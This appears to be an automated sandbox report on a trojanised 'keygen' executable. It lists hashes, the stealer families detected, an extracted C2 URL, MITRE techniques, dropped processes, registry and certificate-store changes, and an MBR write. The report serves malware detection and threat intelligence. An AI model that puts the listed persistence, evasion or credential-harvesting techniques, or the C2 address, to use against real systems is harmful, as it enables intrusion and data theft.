azorult | c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61

Analysis

max time kernel
233s
max time network
306s
platform
windows10_x64
resource
win10v20201028
submitted
09-03-2021 14:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Size

36.2MB
MD5

865c79976b6a4688551d5be9437163aa
SHA1

3aa11e3924100cbb8c92c2b396eedd93279ef878
SHA256

c59ce6ed0ebcfce3bc9c950ac699944405a6447e40a24697482cf64a0fb37e61
SHA512

f728bf7eb0411c41f416b437e908e7727f3b25f91bdd1715964be37e16dfc7638e58c2874d910ef2d8c10d0c46ff39aede8e662b35f0161cd426e4b46efadb33

Score

10^/10

azorult pony raccoon redline 51c194bfb6e404af0e5ff0b93b443907a6a845b1 bootkit discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

raccoon

Botnet

51c194bfb6e404af0e5ff0b93b443907a6a845b1

Attributes

url4cnc
https://telete.in/h_focus_1

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5220-248-0x0000000004950000-0x0000000004976000-memory.dmp	family_redline
behavioral1/memory/5220-241-0x0000000002580000-0x00000000025A8000-memory.dmp	family_redline
behavioral1/memory/6704-459-0x0000000000400000-0x0000000000426000-memory.dmp	family_redline

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 48 IoCs

Processes:

KMSAuto Net.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exebin_x64.datbin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exebin_x64.datFakeClient.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datKMSSS.exeSppPatcher_x64.datSppExtComObjPatcher.exeStellar.Phoenix.Data.Recovery.crack.by.orion.exekeygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exeaskinstall20.exeStellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

pid	process
1052	KMSAuto Net.exe
2600	wzt.dat
2588	certmgr.exe
984	certmgr.exe
2364	bin.dat
2608	AESDecoder.exe
3980	bin_x64.dat
3284	KMSSS.exe
3916	bin_x64.dat
2448	bin_x64.dat
1136	FakeClient.exe
1324	bin_x64.dat
3960	FakeClient.exe
1596	bin_x64.dat
3852	FakeClient.exe
428	bin_x64.dat
2912	FakeClient.exe
516	bin_x64.dat
2240	FakeClient.exe
812	bin_x64.dat
4036	FakeClient.exe
3168	bin_x64.dat
3856	FakeClient.exe
2912	bin_x64.dat
2908	FakeClient.exe
2328	bin_x64.dat
2108	FakeClient.exe
2100	wzt.dat
804	certmgr.exe
1628	certmgr.exe
3808	bin.dat
896	AESDecoder.exe
936	bin_x64.dat
588	KMSSS.exe
1680	SppPatcher_x64.dat
3792	SppExtComObjPatcher.exe
3068	Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
3924	keygen-pr.exe
2576	keygen-step-1.exe
988	keygen-step-3.exe
3692	keygen-step-4.exe
2380	key.exe
2728	Setup.exe
3904	key.exe
4244	AD754B4D3FE2C4EE.exe
4252	AD754B4D3FE2C4EE.exe
4324	askinstall20.exe
4380	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 19 IoCs

Processes:

FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeSppExtComObj.exeMsiExec.exe

pid	process
1136	FakeClient.exe
1136	FakeClient.exe
3960	FakeClient.exe
3852	FakeClient.exe
3852	FakeClient.exe
2912	FakeClient.exe
2912	FakeClient.exe
2240	FakeClient.exe
2240	FakeClient.exe
4036	FakeClient.exe
4036	FakeClient.exe
3856	FakeClient.exe
3856	FakeClient.exe
2908	FakeClient.exe
2908	FakeClient.exe
2108	FakeClient.exe
2108	FakeClient.exe
2324	SppExtComObj.exe
4156	MsiExec.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

123 ipinfo.io
190 ip-api.com
206 ipinfo.io
275 ipinfo.io
83 api.ipify.org
120 ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

Setup.exe

description ioc process

File opened for modification \??\PhysicalDrive0 Setup.exe

flow	ioc
123	ipinfo.io
190	ip-api.com
206	ipinfo.io
275	ipinfo.io
83	api.ipify.org
120	ipinfo.io

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe

Drops file in System32 directory 4 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File created	C:\Windows\System32\SppExtComObjPatcher.exe	cmd.exe
File opened for modification	C:\Windows\System32\SppExtComObjPatcher.exe	cmd.exe
File created	C:\Windows\System32\SppExtComObjHook.dll	cmd.exe
File opened for modification	C:\Windows\System32\SppExtComObjHook.dll	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Setup.exe

pid process

2728 Setup.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

key.exe

description pid process target process

PID 2380 set thread context of 3904 2380 key.exe key.exe

pid	process
2728	Setup.exe

description	pid	process	target process
PID 2380 set thread context of 3904	2380	key.exe	key.exe

Drops file in Windows directory 16 IoCs

Processes:

FakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exeFakeClient.exe

description	ioc	process
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe
File opened for modification	C:\Windows\setuperr.log	FakeClient.exe
File opened for modification	C:\Windows\setupact.log	FakeClient.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

AD754B4D3FE2C4EE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	AD754B4D3FE2C4EE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	AD754B4D3FE2C4EE.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXENETSTAT.EXE

pid process

4076 NETSTAT.EXE
2440 NETSTAT.EXE

pid	process
4076	NETSTAT.EXE
2440	NETSTAT.EXE

Kills process with taskkill 20 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1136	taskkill.exe
1256	taskkill.exe
4040	taskkill.exe
3972	taskkill.exe
3976	taskkill.exe
6712	taskkill.exe
1020	taskkill.exe
3796	taskkill.exe
4636	taskkill.exe
4160	taskkill.exe
6964	taskkill.exe
1188	taskkill.exe
2288	taskkill.exe
3684	taskkill.exe
1500	taskkill.exe
3924	taskkill.exe
3004	taskkill.exe
4976	taskkill.exe
7728	taskkill.exe
1400	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

Processes:

reg.exeSppExtComObj.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	SppExtComObj.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress = "1.2.3.4"	SppExtComObj.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE	SppExtComObj.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f	reg.exe

Modifies registry class 2 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2368 reg.exe
3900 reg.exe

pid	process
2368	reg.exe
3900	reg.exe

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

certmgr.execertmgr.execertmgr.exeaskinstall20.execertmgr.exeSetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
